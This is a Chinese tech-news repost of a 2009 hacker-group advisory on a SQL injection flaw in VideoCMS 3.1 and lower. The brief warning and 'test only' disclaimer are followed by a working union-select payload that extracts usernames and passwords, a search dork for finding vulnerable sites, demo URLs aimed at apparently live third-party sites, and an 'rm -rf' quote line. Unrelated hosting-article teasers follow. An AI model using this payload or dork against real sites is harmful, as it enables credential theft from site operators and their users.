VideoCMS存在SQL注入漏洞 使用此CMS的公司请做防范

【.com综合消息】VideoCMS存在SQL injection漏洞,使用此CMS的公司请做防范。以下是编辑找到的测试代码,仅做测试,请勿用于非法用途。

[~] VideoCMS SQL injection vulnerability – (id)                                   #

[~] Author : kaMtiEz ([email protected])                                    #

[~] Homepage : http://www.indonesiancoder.com                                  #

[~] Date : Desember 14, 2009                                               #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.codemight.com/
[+] Download : –
[+] version : 3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : “Think iT”
[+] Price : dunno           
[+] Location : INDONESIA – JOGJA
[+] description http://www.codemight.com/index.php?m=product&p=1

##################################################################################

[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL]

[ Exploit ]

/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users–

[ Demo ]

http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users–
http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users–

===========================================================================

[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] segelas vodka menemaniku setiap malam .. 😛
[+] Dengerin Radio yach di http://antisecradio.fm ok coy ?

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM

【编辑推荐】

  1. Oracle数据库内部安全威胁:严重性
  2. 专题:网站常见的攻击与防御
  3. 卡巴斯基发布2010年网络威胁六项预测
  4. Web应用防火墙是如何为客户提供防护的
  5. 选择硬件防火墙时你应注意的十件事
  6. 深入理解防火墙 有效屏蔽外界的攻击
  7. 防火墙功能分类及其局限性介绍分析

文章来源网络,作者:管理,如若转载,请注明出处:https://shuyeidc.com/wp/134835.html<

(0)
管理的头像管理
上一篇2025-03-01 08:24
下一篇 2025-03-01 08:26

相关推荐

  • 站群服务器IP段怎么选最安全,有哪些注意事项

    选择站群服务器IP段的安全核心在于IP地址的独立性、机房的路由策略以及服务商的合规资质,一个可靠的IP段必须来自持牌自营机房,具备独立C段和清洗能力,才能避免被关联风险,为什么IP段选择决定站群安全搜索引擎对IP关联的识别算法近年来越来越精细,同一C段或广播域的IP,爬虫通过反向DNS、路由跳数等特征很容易判断……

    2026-07-26
    0
  • 企业上云到底有什么实际好处,企业上云怎么选云服务商

    企业上云最大的实际好处,是把传统的机房运维包袱转化为可按需购买的专业服务,让企业成本更可控、业务更敏捷、安全更合规,成本重构:从买硬件到买服务传统企业自建机房,一次性投入大量资金购买服务器和网络设备,还得预留资源应对业务高峰,平时这些资源可能闲置浪费,上云之后,计算资源变成像水电一样按量付费的运营支出,告别资源……

    2026-07-26
    0
  • 流量清洗的工作原理到底是什么,有什么作用?

    流量清洗本质上是实时识别并过滤攻击流量,只将干净流量放行至目标服务器,是DDoS防护体系中的核心环节,为什么需要流量清洗近年来,DDoS攻击的规模和频率持续攀升,据行业报告,攻击带宽已轻松突破T级,攻击手法从单一的流量型攻击向应用层攻击演变,传统的防火墙或入侵检测系统在面对海量攻击流量时,往往自身先被耗尽,导致……

    2026-07-26
    0
  • CNNIC IP 联盟成员需要什么资质?,申请条件是什么?

    CNNIC IP联盟成员资质是互联网服务商直接从事IP地址分配与管理的官方权威身份,它意味着该服务商拥有独立、稳定的IP资源来源,是选择IDC服务时不可忽视的核心资质之一,什么是CNNIC IP联盟成员:拆解这项资质的真实含义CNNIC(中国互联网络信息中心)是国家级互联网地址资源管理机构,负责IP地址、AS号……

    2026-07-26
    0
  • 站群服务器怎么选才不会被 K 站,有哪些注意事项?

    站群服务器选不好,再好的内容也白费,核心在于IP绝对独立、环境完全隔离、运营全面合规,三者缺一不可,为什么站群服务器容易被K站搜索引擎对站群行为的打击,本质是为了打击低质量、批量复制、缺乏独立价值的站点,当多个站点共享同一IP段、相同服务器环境甚至同一套程序时,搜索引擎很容易将这些站点归为同一运营主体,进而判断……

    2026-07-26
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注